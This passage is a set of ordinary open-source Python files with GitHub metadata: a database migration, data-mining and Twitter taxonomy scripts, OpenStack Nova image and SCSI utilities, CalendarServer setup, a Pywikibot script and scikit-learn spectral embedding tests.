Create Date: 2017-04-02 13:11:00.655727
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '298bbf22bdb8'
down_revision = 'b976e7a7dc35'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('person', sa.Column('is_admin', sa.Boolean()))
op.add_column('person', sa.Column('is_brewer', sa.Boolean()))
op.add_column('person', sa.Column('is_manager', sa.Boolean()))
op.execute('UPDATE person SET is_admin=False, is_brewer=False, is_manager=False')
op.alter_column('person', 'is_admin', nullable=False)
op.alter_column('person', 'is_brewer', nullable=False)
op.alter_column('person', 'is_manager', nullable=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('person', 'is_manager')
op.drop_column('person', 'is_brewer')
op.drop_column('person', 'is_admin')
# ### end Alembic commands ###
| {
"content_hash": "7476f4516b02309e2aaf39009ca6d8da",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 85,
"avg_line_length": 31.166666666666668,
"alnum_prop": 0.6737967914438503,
"repo_name": "CapitalD/taplist",
"id": "25f1970b18bcd9b8f90cffabbd29a6cbd65cf459",
"size": "1122",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "migrations/versions/298bbf22bdb8_.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1628"
},
{
"name": "HTML",
"bytes": "51309"
},
{
"name": "JavaScript",
"bytes": "1871"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "45741"
}
],
"symlink_target": ""
} |
import MySQLdb
import Apriori
# get tags data from db
db = MySQLdb.connect( "localhost", "", "", "" )
cursor = db.cursor()
sql = "SELECT * FROM article_tags LIMIT 0,50000"
tagsdata = {}
try:
cursor.execute( sql )
result = cursor.fetchall()
for row in result:
tags = []
id = row[0]
articleid = row[1]
tagid = row[2]
if articleid not in tagsdata:
tagsdata[articleid] = []
tagsdata[articleid].append(tagid)
#print "id is %d, article_id is %s, tag_id is %d" % ( id, articleid, tagid )
except MySQLdb.Error,e:
print "Error: unable to fecht db! %d: %s" % (e.args[0],e.args[1])
print "data count is ", len( tagsdata )
apriori = Apriori.Apriori( tagsdata )
apriori.main()
db.close() | {
"content_hash": "6ec2701ac81a68c3d04f19fbf77c533a",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 78,
"avg_line_length": 24.928571428571427,
"alnum_prop": 0.6547277936962751,
"repo_name": "jjyoung/Apriori",
"id": "57b338d3e57a1c4e2cb7cd574c2f5005ebcc5bf3",
"size": "788",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tool_tagsRelation.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "6521"
}
],
"symlink_target": ""
} |
import codecs
from collections import defaultdict, OrderedDict
import json
import re
import glob, os
import math
import itertools
f_in = "tweets_taxonomy_clean.JSON"
f_in_user_ids = "user_IDs.dat"
IN_DIR = "../DATA/taxonomy_stats/"
def read_user_IDs():
user_ids = defaultdict(str)
with codecs.open(f_in_user_ids,'r', encoding='utf8') as f:
for line in f:
line = line.split()
user_id = line[0]
user = line[1]
user_ids[user] = user_id
return user_ids
def read_save_taxonomy(users="ALL", user_list=None, WRITE=False,TOP_N = 20):
docSentiment_sum = defaultdict(int)
taxonomies_sum = defaultdict(int)
user_ids = read_user_IDs()
cnt = 0
with codecs.open(f_in,'r', encoding='utf8') as input_file:
for line7s in input_file:
try:
line = json.loads(line7s)
taxonomy_all = line["taxonomy"]
keywords = taxonomy_all["keywords"]
entities = taxonomy_all["entities"]
taxonomy = taxonomy_all["taxonomy"]
docSentiment = taxonomy_all["docSentiment"]
concepts = taxonomy_all["concepts"]
except KeyError:
#print line7s
continue
sentiment = docSentiment["type"]
if sentiment == "neutral":
docSentiment_sum[sentiment] += 1
else:
if not sentiment in docSentiment_sum:
docSentiment_sum[sentiment] = defaultdict(int)
old_score = docSentiment_sum[sentiment][0]
old_cnt = docSentiment_sum[sentiment][1]
old_mixed_cnt = docSentiment_sum[sentiment][2]
try:
new_score = old_score + float(docSentiment["score"])
except KeyError:
continue
new_cnt = old_cnt + 1
try:
new_mixed_cnt = old_mixed_cnt + int(docSentiment["mixed"])
except KeyError:
continue
docSentiment_sum[sentiment] = (new_score, new_cnt, new_mixed_cnt)
for el in taxonomy:
try:
if el["confident"] == "no":
continue
except: KeyError
taxonomy_tree = el["label"]
taxonomy_tree = taxonomy_tree.split("/")
taxonomy_tree.pop(0)
levels = len(taxonomy_tree)
s = taxonomies_sum
# go until the last element; on the last, we will not create a dict NONO
for tax_class in taxonomy_tree:
#print tax_class
if tax_class not in s.keys():
s[tax_class] = defaultdict(int)
#print taxonomies_sum
#return
s = s[tax_class]
#last_tax_class = taxonomy_tree[levels-1]
#s = s[last_tax_class]
old_score = s["size"]
#old_cnt = s[tax_class][1]
#old_sent = s[tax_class][2]
new_score = old_score + float(el["score"])
s["size"] = new_score
# this shows that it takes as confident only those above 0.4
if float(el["score"]) < 0.4:
print float(el["score"])
if sentiment <> "neutral":
old_sent = s["sentiment"]
new_sent = old_sent + float(docSentiment["score"])
s["sentiment"] = new_sent
cnt += 1
com_size = cnt
N = cnt
print cnt
print "Total taxonomies on different levels found ", len(taxonomies_sum)
print "Total Sentiments found ", len(docSentiment_sum)
if WRITE:
f_out_name = "ALL/taxon_ALL.json"
#taxonomies_out7s = recursive_writeable_json_from_dict(taxonomies_sum)
print len(taxonomies_sum), type(taxonomies_sum)
#for el in taxonomies_sum.items():
# print el
taxonomies_out7s = recursive_writeable_json_from_dict(taxonomies_sum, "thing")
print len(taxonomies_out7s), type(taxonomies_out7s)
with codecs.open(f_out_name,'w', encoding='utf8') as f:
f.write("{ \"name\": \"thing\", \n \"children\": \n ")
f.write(unicode(json.dumps(taxonomies_out7s, ensure_ascii=False)) + '\n')
f.write("\n }")
def recursive_writeable_json_from_dict(d, dname):
# stop criteria: len(d) == 1 means this is a leaf
# (should not allow here to arrive, for example { "size": 1.381699 } )
# only, for example { "poetry": { "size": 1.381699 } }
if len(d) == 1:
s = {}
#print d, d.items()[0][1], d.items()[0][0]
s["size"] = d.items()[0][1]["size"]
s["name"] = d.items()[0][0]
#print s["name"]
return s
# recursive criteria satisfied: create a new dict
# add me my children, since I have
#s = {}
#s["children"] = []
s = []
for child_k in d.keys():
if child_k == "size":
if d[child_k] <> 0:
#s["size"] = d[child_k]
s.append({"size":d[child_k], "name":dname})
else:
child_el = d[child_k]
ss = {"name": child_k}
try:
ss["size"] = child_el["size"]
except: KeyError
# this is a check to avoid passing { "size": 1.381699 }
#if child_el.items()[0][0] == "size" and len(child_el) == 1:
# s["children"].append()
# continue
#print child_el
#if len(child_el) > 1:
#ss["children"] = recursive_writeable_json_from_dict(child_el)
if child_el.items()[0][0] == "size" and len(child_el) == 1:
#s["children"].append(ss)
s.append(ss)
continue
ss["children"] = recursive_writeable_json_from_dict(child_el, child_k)
#s["children"].append(ss)
s.append(ss)
return s
def main():
os.chdir(IN_DIR)
read_save_taxonomy(WRITE=True)
main()
| {
"content_hash": "a9ad2cf221db3fc42365ff9f9d7edd16",
"timestamp": "",
"source": "github",
"line_count": 192,
"max_line_length": 90,
"avg_line_length": 32.984375,
"alnum_prop": 0.49313121743249644,
"repo_name": "sanja7s/SR_Twitter",
"id": "2ceaa1301c8a4a200b8bb9fee0f53fdac6f2689c",
"size": "6380",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src_taxonomy/visualize_taxonomy_ALL.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1100223"
}
],
"symlink_target": ""
} |
import functools
import sys
from oslo_config import cfg
from nova.compute import utils as compute_utils
from nova import exception
from nova.image import glance
from nova.openstack.common import log as logging
from nova import utils
from nova.virt.xenapi import vm_utils
CONF = cfg.CONF
CONF.import_opt('num_retries', 'nova.image.glance', group='glance')
LOG = logging.getLogger(__name__)
class GlanceStore(object):
def _call_glance_plugin(self, context, instance, session, fn, params):
glance_api_servers = glance.get_api_servers()
def pick_glance(kwargs):
g_host, g_port, g_use_ssl = glance_api_servers.next()
kwargs['glance_host'] = g_host
kwargs['glance_port'] = g_port
kwargs['glance_use_ssl'] = g_use_ssl
return g_host
def retry_cb(context, instance, exc=None):
if exc:
exc_info = sys.exc_info()
LOG.debug(exc.message, exc_info=exc_info)
compute_utils.add_instance_fault_from_exc(
context, instance, exc, exc_info)
cb = functools.partial(retry_cb, context, instance)
return session.call_plugin_serialized_with_retry(
'glance', fn, CONF.glance.num_retries, pick_glance, cb, **params)
def _make_params(self, context, session, image_id):
return {'image_id': image_id,
'sr_path': vm_utils.get_sr_path(session),
'extra_headers': glance.generate_identity_headers(context)}
def download_image(self, context, session, instance, image_id):
params = self._make_params(context, session, image_id)
params['uuid_stack'] = vm_utils._make_uuid_stack()
try:
vdis = self._call_glance_plugin(context, instance, session,
'download_vhd', params)
except exception.PluginRetriesExceeded:
raise exception.CouldNotFetchImage(image_id=image_id)
return vdis
def upload_image(self, context, session, instance, image_id, vdi_uuids):
params = self._make_params(context, session, image_id)
params['vdi_uuids'] = vdi_uuids
props = params['properties'] = {}
props['auto_disk_config'] = instance['auto_disk_config']
props['os_type'] = instance.get('os_type', None) or (
CONF.xenserver.default_os_type)
compression_level = vm_utils.get_compression_level()
if compression_level:
props['xenapi_image_compression_level'] = compression_level
auto_disk_config = utils.get_auto_disk_config_from_instance(instance)
if utils.is_auto_disk_config_disabled(auto_disk_config):
props["auto_disk_config"] = "disabled"
try:
self._call_glance_plugin(context, instance, session,
'upload_vhd', params)
except exception.PluginRetriesExceeded:
raise exception.CouldNotUploadImage(image_id=image_id)
| {
"content_hash": "6900d20a88d6b038077fd280ed4eba19",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 77,
"avg_line_length": 38.151898734177216,
"alnum_prop": 0.6184472461844724,
"repo_name": "sajeeshcs/nested_quota_final",
"id": "85599b11a02a7484450ecb7bdfd497ad69a09dd3",
"size": "3650",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/virt/xenapi/image/glance.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "5941"
},
{
"name": "Python",
"bytes": "15636233"
},
{
"name": "Shell",
"bytes": "17729"
},
{
"name": "XML",
"bytes": "45372"
}
],
"symlink_target": ""
} |
"""
CalDAV support for Twext.Web2.
See RFC 4791.
"""
#
# Load in suitable file extension/content-type map from OS X
#
from txweb2.static import File, loadMimeTypes
File.contentTypes = loadMimeTypes(("/etc/apache2/mime.types", "/etc/httpd/mime.types",))
#
# Register additional WebDAV XML elements
#
import twistedcaldav.caldavxml
import twistedcaldav.carddavxml
import twistedcaldav.mkcolxml
import twistedcaldav.customxml
import twistedcaldav.timezonexml
twistedcaldav # Shhh.. pyflakes
#
# DefaultHTTPHandler
#
from txweb2.http_headers import DefaultHTTPHandler, last, singleHeader
DefaultHTTPHandler.updateParsers({
"If-Schedule-Tag-Match": (last, str),
})
DefaultHTTPHandler.updateGenerators({
"Schedule-Tag": (str, singleHeader),
})
# Do some PyCalendar init
from pycalendar.icalendar.calendar import Calendar
from pycalendar.icalendar.property import Property
from pycalendar.vcard.card import Card
from pycalendar.value import Value
Calendar.setPRODID("-//CALENDARSERVER.ORG//NONSGML Version 1//EN")
Card.setPRODID("-//CALENDARSERVER.ORG//NONSGML Version 1//EN")
# These are properties we use directly and we want the default value type set for TEXT
Property.registerDefaultValue("X-CALENDARSERVER-PRIVATE-COMMENT", Value.VALUETYPE_TEXT)
Property.registerDefaultValue("X-CALENDARSERVER-ATTENDEE-COMMENT", Value.VALUETYPE_TEXT)
Property.registerDefaultValue("X-APPLE-TRAVEL-DURATION", Value.VALUETYPE_DURATION, always_write_value=True)
Property.registerDefaultValue("X-APPLE-TRAVEL-START", Value.VALUETYPE_URI, always_write_value=True)
Property.registerDefaultValue("X-APPLE-TRAVEL-RETURN-DURATION", Value.VALUETYPE_DURATION, always_write_value=True)
Property.registerDefaultValue("X-APPLE-TRAVEL-RETURN", Value.VALUETYPE_URI, always_write_value=True)
| {
"content_hash": "9376642ad47b895a246cd3208990155c",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 114,
"avg_line_length": 31.785714285714285,
"alnum_prop": 0.801123595505618,
"repo_name": "red-hood/calendarserver",
"id": "c8453d5d7eb410f5c68e160f3dd09663117027e2",
"size": "2427",
"binary": false,
"copies": "1",
"ref": "refs/heads/trunk",
"path": "twistedcaldav/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "1482"
},
{
"name": "CSS",
"bytes": "4214"
},
{
"name": "DIGITAL Command Language",
"bytes": "1234"
},
{
"name": "DTrace",
"bytes": "13143"
},
{
"name": "HTML",
"bytes": "36120"
},
{
"name": "JavaScript",
"bytes": "80248"
},
{
"name": "Makefile",
"bytes": "14429"
},
{
"name": "PLSQL",
"bytes": "12719"
},
{
"name": "PLpgSQL",
"bytes": "291431"
},
{
"name": "Python",
"bytes": "10537612"
},
{
"name": "R",
"bytes": "1091"
},
{
"name": "SQLPL",
"bytes": "6430"
},
{
"name": "Shell",
"bytes": "96975"
}
],
"symlink_target": ""
} |
"""
Include Commons template in home wiki.
This bot functions mainly in the en.wikipedia, because it
compares the names of articles and category in English
language (standard language in Commons). If the name of
an article in Commons will not be in English but with
redirect, this also functions.
Run:
Syntax:
python pwb.py commons_link [action] [pagegenerator]
where action can be one of these:
* pages : Run over articles, include {{commons}}
* categories : Run over categories, include {{commonscat}}
and pagegenerator can be one of these:
¶ms;
"""
#
# (C) Leonardo Gregianin, 2006
# (C) Pywikibot team, 2007-2017
#
# Distributed under the terms of the MIT license.
#
# Ported by Geoffrey "GEOFBOT" Mon for Google Code-In 2013
# User:Sn1per
#
from __future__ import absolute_import, unicode_literals
__version__ = '$Id$'
import re
import pywikibot
from pywikibot import textlib, pagegenerators, i18n, Bot
docuReplacements = {
'¶ms;': pagegenerators.parameterHelp,
}
class CommonsLinkBot(Bot):
"""Commons linking bot."""
def __init__(self, generator, **kwargs):
"""Constructor."""
self.availableOptions.update({
'action': None,
})
super(CommonsLinkBot, self).__init__(**kwargs)
self.generator = generator
self.findTemplate = re.compile(r'\{\{[Ss]isterlinks')
self.findTemplate2 = re.compile(r'\{\{[Cc]ommonscat')
self.findTemplate3 = re.compile(r'\{\{[Cc]ommons')
def run(self):
"""Run the bot."""
if not all((self.getOption('action'), self.generator)):
return
catmode = (self.getOption('action') == 'categories')
for page in self.generator:
try:
self.current_page = page
commons = page.site.image_repository()
commonspage = getattr(pywikibot,
('Page', 'Category')[catmode]
)(commons, page.title())
try:
commonspage.get(get_redirect=True)
pagetitle = commonspage.title(withNamespace=not catmode)
if page.title() == pagetitle:
oldText = page.get()
text = oldText
# for Commons/Commonscat template
s = self.findTemplate.search(text)
s2 = getattr(self, 'findTemplate%d'
% (2, 3)[catmode]).search(text)
if s or s2:
pywikibot.output(u'** Already done.')
else:
cats = textlib.getCategoryLinks(text,
site=page.site)
text = textlib.replaceCategoryLinks(
u'%s{{commons%s|%s}}'
% (text, ('', 'cat')[catmode], pagetitle),
cats, site=page.site)
comment = i18n.twtranslate(
page.site, 'commons_link%s-template-added'
% ('', '-cat')[catmode])
try:
self.userPut(page, oldText, text,
summary=comment)
except pywikibot.EditConflict:
pywikibot.output(
u'Skipping %s because of edit conflict'
% page.title())
except pywikibot.NoPage:
pywikibot.output(u'%s does not exist in Commons'
% page.__class__.__name__)
except pywikibot.NoPage:
pywikibot.output(u'Page %s does not exist' % page.title())
except pywikibot.IsRedirectPage:
pywikibot.output(u'Page %s is a redirect; skipping.'
% page.title())
except pywikibot.LockedPage:
pywikibot.output(u'Page %s is locked' % page.title())
def main(*args):
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: list of unicode
"""
options = {}
local_args = pywikibot.handle_args(args)
genFactory = pagegenerators.GeneratorFactory()
for arg in local_args:
if arg in ('pages', 'categories'):
options['action'] = arg
elif arg == '-always':
options['always'] = True
else:
genFactory.handleArg(arg)
gen = genFactory.getCombinedGenerator(preload=True)
if 'action' in options and gen:
bot = CommonsLinkBot(gen, **options)
bot.run()
return True
pywikibot.bot.suggest_help(missing_action='action' not in options,
missing_generator=not gen)
return False
if __name__ == "__main__":
main()
| {
"content_hash": "1c86e1fc5aeee52fae7c01bc8d078d38",
"timestamp": "",
"source": "github",
"line_count": 153,
"max_line_length": 76,
"avg_line_length": 33.5359477124183,
"alnum_prop": 0.5145195868251803,
"repo_name": "Darkdadaah/pywikibot-core",
"id": "3ddffaf5d093141550d2f0941e9656b18e1ce9a0",
"size": "5173",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "scripts/commons_link.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "97"
},
{
"name": "HTML",
"bytes": "1365"
},
{
"name": "Python",
"bytes": "4423996"
}
],
"symlink_target": ""
} |
"""Generic linux scsi subsystem utilities."""
from nova import exception
from nova.openstack.common import log as logging
from nova import utils
LOG = logging.getLogger(__name__)
def echo_scsi_command(path, content):
"""Used to echo strings to scsi subsystem."""
args = ["-a", path]
kwargs = dict(process_input=content, run_as_root=True)
utils.execute('tee', *args, **kwargs)
def rescan_hosts(hbas):
for hba in hbas:
echo_scsi_command("/sys/class/scsi_host/%s/scan"
% hba['host_device'], "- - -")
def get_device_list():
(out, err) = utils.execute('sginfo', '-r', run_as_root=True)
devices = []
if out:
line = out.strip()
devices = line.split(" ")
return devices
def get_device_info(device):
(out, err) = utils.execute('sg_scan', device, run_as_root=True)
dev_info = {'device': device, 'host': None,
'channel': None, 'id': None, 'lun': None}
if out:
line = out.strip()
line = line.replace(device + ": ", "")
info = line.split(" ")
for item in info:
if '=' in item:
pair = item.split('=')
dev_info[pair[0]] = pair[1]
elif 'scsi' in item:
dev_info['host'] = item.replace('scsi', '')
return dev_info
def _wait_for_remove(device, tries):
tries = tries + 1
LOG.debug(_("Trying (%(tries)s) to remove device %(device)s")
% {'tries': tries, 'device': device["device"]})
path = "/sys/bus/scsi/drivers/sd/%s:%s:%s:%s/delete"
echo_scsi_command(path % (device["host"], device["channel"],
device["id"], device["lun"]),
"1")
devices = get_device_list()
if device["device"] not in devices:
raise utils.LoopingCallDone()
def remove_device(device):
tries = 0
timer = utils.FixedIntervalLoopingCall(_wait_for_remove, device, tries)
timer.start(interval=2).wait()
timer.stop()
def find_multipath_device(device):
"""Try and discover the multipath device for a volume."""
mdev = None
devices = []
out = None
try:
(out, err) = utils.execute('multipath', '-l', device,
run_as_root=True)
except exception.ProcessExecutionError as exc:
LOG.warn(_("Multipath call failed exit (%(code)s)")
% {'code': exc.exit_code})
return None
if out:
lines = out.strip()
lines = lines.split("\n")
if lines:
line = lines[0]
info = line.split(" ")
# device line output is different depending
# on /etc/multipath.conf settings.
if info[1][:2] == "dm":
mdev = "/dev/%s" % info[1]
elif info[2][:2] == "dm":
mdev = "/dev/%s" % info[2]
if mdev is None:
LOG.warn(_("Couldn't find multipath device %(line)s")
% locals())
return None
LOG.debug(_("Found multipath device = %(mdev)s") % locals())
device_lines = lines[3:]
for dev_line in device_lines:
dev_line = dev_line.strip()
dev_line = dev_line[3:]
dev_info = dev_line.split(" ")
if dev_line.find("policy") != -1:
address = dev_info[0].split(":")
dev = {'device': '/dev/%s' % dev_info[1],
'host': address[0], 'channel': address[1],
'id': address[2], 'lun': address[3]
}
devices.append(dev)
if mdev is not None:
info = {"device": mdev,
"devices": devices}
return info
return None
| {
"content_hash": "c8bc74fb125fb9826c75206ba6416606",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 75,
"avg_line_length": 31.040650406504064,
"alnum_prop": 0.5041906757464641,
"repo_name": "gspilio/nova",
"id": "739092b2e8d03424aef9236730ec9f8753ac2af6",
"size": "4501",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "nova/storage/linuxscsi.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "7403"
},
{
"name": "Python",
"bytes": "9099328"
},
{
"name": "Shell",
"bytes": "17117"
}
],
"symlink_target": ""
} |
import pytest
import numpy as np
from scipy import sparse
from scipy.sparse import csgraph
from scipy.linalg import eigh
from sklearn.manifold.spectral_embedding_ import SpectralEmbedding
from sklearn.manifold.spectral_embedding_ import _graph_is_connected
from sklearn.manifold.spectral_embedding_ import _graph_connected_component
from sklearn.manifold import spectral_embedding
from sklearn.metrics.pairwise import rbf_kernel
from sklearn.metrics import normalized_mutual_info_score
from sklearn.cluster import KMeans
from sklearn.datasets.samples_generator import make_blobs
from sklearn.utils.extmath import _deterministic_vector_sign_flip
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_true, assert_equal, assert_raises
from sklearn.utils.testing import SkipTest
# non centered, sparse centers to check the
centers = np.array([
[0.0, 5.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 4.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 5.0, 1.0],
])
n_samples = 1000
n_clusters, n_features = centers.shape
S, true_labels = make_blobs(n_samples=n_samples, centers=centers,
cluster_std=1., random_state=42)
def _check_with_col_sign_flipping(A, B, tol=0.0):
""" Check array A and B are equal with possible sign flipping on
each columns"""
sign = True
for column_idx in range(A.shape[1]):
sign = sign and ((((A[:, column_idx] -
B[:, column_idx]) ** 2).mean() <= tol ** 2) or
(((A[:, column_idx] +
B[:, column_idx]) ** 2).mean() <= tol ** 2))
if not sign:
return False
return True
def test_sparse_graph_connected_component():
rng = np.random.RandomState(42)
n_samples = 300
boundaries = [0, 42, 121, 200, n_samples]
p = rng.permutation(n_samples)
connections = []
for start, stop in zip(boundaries[:-1], boundaries[1:]):
group = p[start:stop]
# Connect all elements within the group at least once via an
# arbitrary path that spans the group.
for i in range(len(group) - 1):
connections.append((group[i], group[i + 1]))
# Add some more random connections within the group
min_idx, max_idx = 0, len(group) - 1
n_random_connections = 1000
source = rng.randint(min_idx, max_idx, size=n_random_connections)
target = rng.randint(min_idx, max_idx, size=n_random_connections)
connections.extend(zip(group[source], group[target]))
# Build a symmetric affinity matrix
row_idx, column_idx = tuple(np.array(connections).T)
data = rng.uniform(.1, 42, size=len(connections))
affinity = sparse.coo_matrix((data, (row_idx, column_idx)))
affinity = 0.5 * (affinity + affinity.T)
for start, stop in zip(boundaries[:-1], boundaries[1:]):
component_1 = _graph_connected_component(affinity, p[start])
component_size = stop - start
assert_equal(component_1.sum(), component_size)
# We should retrieve the same component mask by starting by both ends
# of the group
component_2 = _graph_connected_component(affinity, p[stop - 1])
assert_equal(component_2.sum(), component_size)
assert_array_equal(component_1, component_2)
def test_spectral_embedding_two_components(seed=36):
# Test spectral embedding with two components
random_state = np.random.RandomState(seed)
n_sample = 100
affinity = np.zeros(shape=[n_sample * 2, n_sample * 2])
# first component
affinity[0:n_sample,
0:n_sample] = np.abs(random_state.randn(n_sample, n_sample)) + 2
# second component
affinity[n_sample::,
n_sample::] = np.abs(random_state.randn(n_sample, n_sample)) + 2
# Test of internal _graph_connected_component before connection
component = _graph_connected_component(affinity, 0)
assert_true(component[:n_sample].all())
assert_true(not component[n_sample:].any())
component = _graph_connected_component(affinity, -1)
assert_true(not component[:n_sample].any())
assert_true(component[n_sample:].all())
# connection
affinity[0, n_sample + 1] = 1
affinity[n_sample + 1, 0] = 1
affinity.flat[::2 * n_sample + 1] = 0
affinity = 0.5 * (affinity + affinity.T)
true_label = np.zeros(shape=2 * n_sample)
true_label[0:n_sample] = 1
se_precomp = SpectralEmbedding(n_components=1, affinity="precomputed",
random_state=np.random.RandomState(seed))
embedded_coordinate = se_precomp.fit_transform(affinity)
# Some numpy versions are touchy with types
embedded_coordinate = \
se_precomp.fit_transform(affinity.astype(np.float32))
# thresholding on the first components using 0.
label_ = np.array(embedded_coordinate.ravel() < 0, dtype="float")
assert_equal(normalized_mutual_info_score(true_label, label_), 1.0)
def test_spectral_embedding_precomputed_affinity(seed=36):
# Test spectral embedding with precomputed kernel
gamma = 1.0
se_precomp = SpectralEmbedding(n_components=2, affinity="precomputed",
random_state=np.random.RandomState(seed))
se_rbf = SpectralEmbedding(n_components=2, affinity="rbf",
gamma=gamma,
random_state=np.random.RandomState(seed))
embed_precomp = se_precomp.fit_transform(rbf_kernel(S, gamma=gamma))
embed_rbf = se_rbf.fit_transform(S)
assert_array_almost_equal(
se_precomp.affinity_matrix_, se_rbf.affinity_matrix_)
assert_true(_check_with_col_sign_flipping(embed_precomp, embed_rbf, 0.05))
def test_spectral_embedding_callable_affinity(seed=36):
# Test spectral embedding with callable affinity
gamma = 0.9
kern = rbf_kernel(S, gamma=gamma)
se_callable = SpectralEmbedding(n_components=2,
affinity=(
lambda x: rbf_kernel(x, gamma=gamma)),
gamma=gamma,
random_state=np.random.RandomState(seed))
se_rbf = SpectralEmbedding(n_components=2, affinity="rbf",
gamma=gamma,
random_state=np.random.RandomState(seed))
embed_rbf = se_rbf.fit_transform(S)
embed_callable = se_callable.fit_transform(S)
assert_array_almost_equal(
se_callable.affinity_matrix_, se_rbf.affinity_matrix_)
assert_array_almost_equal(kern, se_rbf.affinity_matrix_)
assert_true(
_check_with_col_sign_flipping(embed_rbf, embed_callable, 0.05))
def test_spectral_embedding_amg_solver(seed=36):
# Test spectral embedding with amg solver
try:
from pyamg import smoothed_aggregation_solver # noqa
except ImportError:
raise SkipTest("pyamg not available.")
se_amg = SpectralEmbedding(n_components=2, affinity="nearest_neighbors",
eigen_solver="amg", n_neighbors=5,
random_state=np.random.RandomState(seed))
se_arpack = SpectralEmbedding(n_components=2, affinity="nearest_neighbors",
eigen_solver="arpack", n_neighbors=5,
random_state=np.random.RandomState(seed))
embed_amg = se_amg.fit_transform(S)
embed_arpack = se_arpack.fit_transform(S)
assert_true(_check_with_col_sign_flipping(embed_amg, embed_arpack, 0.05))
def test_pipeline_spectral_clustering(seed=36):
# Test using pipeline to do spectral clustering
random_state = np.random.RandomState(seed)
se_rbf = SpectralEmbedding(n_components=n_clusters,
affinity="rbf",
random_state=random_state)
se_knn = SpectralEmbedding(n_components=n_clusters,
affinity="nearest_neighbors",
n_neighbors=5,
random_state=random_state)
for se in [se_rbf, se_knn]:
km = KMeans(n_clusters=n_clusters, random_state=random_state)
km.fit(se.fit_transform(S))
assert_array_almost_equal(
normalized_mutual_info_score(
km.labels_,
true_labels), 1.0, 2)
def test_spectral_embedding_unknown_eigensolver(seed=36):
# Test that SpectralClustering fails with an unknown eigensolver
se = SpectralEmbedding(n_components=1, affinity="precomputed",
random_state=np.random.RandomState(seed),
eigen_solver="<unknown>")
assert_raises(ValueError, se.fit, S)
def test_spectral_embedding_unknown_affinity(seed=36):
# Test that SpectralClustering fails with an unknown affinity type
se = SpectralEmbedding(n_components=1, affinity="<unknown>",
random_state=np.random.RandomState(seed))
assert_raises(ValueError, se.fit, S)
def test_connectivity(seed=36):
# Test that graph connectivity test works as expected
graph = np.array([[1, 0, 0, 0, 0],
[0, 1, 1, 0, 0],
[0, 1, 1, 1, 0],
[0, 0, 1, 1, 1],
[0, 0, 0, 1, 1]])
assert_equal(_graph_is_connected(graph), False)
assert_equal(_graph_is_connected(sparse.csr_matrix(graph)), False)
assert_equal(_graph_is_connected(sparse.csc_matrix(graph)), False)
graph = np.array([[1, 1, 0, 0, 0],
[1, 1, 1, 0, 0],
[0, 1, 1, 1, 0],
[0, 0, 1, 1, 1],
[0, 0, 0, 1, 1]])
assert_equal(_graph_is_connected(graph), True)
assert_equal(_graph_is_connected(sparse.csr_matrix(graph)), True)
assert_equal(_graph_is_connected(sparse.csc_matrix(graph)), True)
def test_spectral_embedding_deterministic():
# Test that Spectral Embedding is deterministic
random_state = np.random.RandomState(36)
data = random_state.randn(10, 30)
sims = rbf_kernel(data)
embedding_1 = spectral_embedding(sims)
embedding_2 = spectral_embedding(sims)
assert_array_almost_equal(embedding_1, embedding_2)
def test_spectral_embedding_unnormalized():
# Test that spectral_embedding is also processing unnormalized laplacian
# correctly
random_state = np.random.RandomState(36)
data = random_state.randn(10, 30)
sims = rbf_kernel(data)
n_components = 8
embedding_1 = spectral_embedding(sims,
norm_laplacian=False,
n_components=n_components,
drop_first=False)
# Verify using manual computation with dense eigh
laplacian, dd = csgraph.laplacian(sims, normed=False,
return_diag=True)
_, diffusion_map = eigh(laplacian)
embedding_2 = diffusion_map.T[:n_components]
embedding_2 = _deterministic_vector_sign_flip(embedding_2).T
assert_array_almost_equal(embedding_1, embedding_2)
def test_spectral_embedding_first_eigen_vector():
# Test that the first eigenvector of spectral_embedding
# is constant and that the second is not (for a connected graph)
random_state = np.random.RandomState(36)
data = random_state.randn(10, 30)
sims = rbf_kernel(data)
n_components = 2
for seed in range(10):
embedding = spectral_embedding(sims,
norm_laplacian=False,
n_components=n_components,
drop_first=False,
random_state=seed)
assert np.std(embedding[:, 0]) == pytest.approx(0)
assert np.std(embedding[:, 1]) > 1e-3
| {
"content_hash": "19e8b0cd909f95cd0722458256b58e5c",
"timestamp": "",
"source": "github",
"line_count": 285,
"max_line_length": 79,
"avg_line_length": 41.694736842105264,
"alnum_prop": 0.6159219052427838,
"repo_name": "BiaDarkia/scikit-learn",
"id": "bc32b58c6e7ffc5b729230e95d7f6b33bc570893",
"size": "11883",
"binary": false,
"copies": "13",
"ref": "refs/heads/master",
"path": "sklearn/manifold/tests/test_spectral_embedding.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "394787"
},
{
